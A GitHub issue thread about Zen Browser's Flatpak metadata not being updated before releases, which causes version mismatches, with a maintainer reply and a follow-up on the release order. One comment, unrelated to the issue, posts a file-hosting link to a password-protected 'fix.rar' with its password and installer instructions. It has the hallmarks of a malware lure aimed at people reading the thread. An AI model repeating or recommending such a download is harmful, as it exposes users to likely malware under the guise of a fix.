### ISSUE TITLE
Release section is not being updated before releases, causing version missmatch

### ISSUE THREAD

**Issue by LeMoonStar** [zen-browser/flatpak#5]
Flatpak derives the current version from the latest release in the `<release>` tag of [io.github.zen_browser.zen.metainfo.xml](https://github.com/zen-browser/flatpak/blob/main/io.github.zen_browser.zen.metainfo.xml) (based on my observations!).
As the [io.github.zen_browser.zen.yml.template](https://github.com/zen-browser/desktop/blob/main/flatpak/io.github.zen_browser.zen.yml.template) uses the **latest release from this repository for metadata**, this repository **has to be updated** and get an new release **before the pull request to [flathub/io.github.zen_browser.zen)](https://github.com/flathub/io.github.zen_browser.zen)** is submitted by the [prepare-flatpak-release.py](https://github.com/zen-browser/desktop/blob/main/scripts/prepare-flatpak-release.py) script used in the release action of zen-browser/desktop - **preferably, the link** in the generated .yml file **would also point to a specific version of this metadata**, instead of the latest release.

As this is currently often done **in the wrong order**, or this repository is **not being updated at all**, the flatpak package constantly has **version mismatches**.
As the `<release>` tag in the metadata is always just a link to the release notes on the website, this could **relatively easily be automated** - resulting in a ***nicer developer experience and accurate versions for flatpaks***.

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mauro-balades** [comment]
Should be fixed

**Comment by LeMoonStar** [comment]
@mauro-balades Please keep in mind this has to be done with ***every*** release, **BEFORE** a release is issued with FlatHub.

Changing the version AFTER the package was built, will not change the version.

I highly recommend adding this action to the GitHub Action creating the releases.
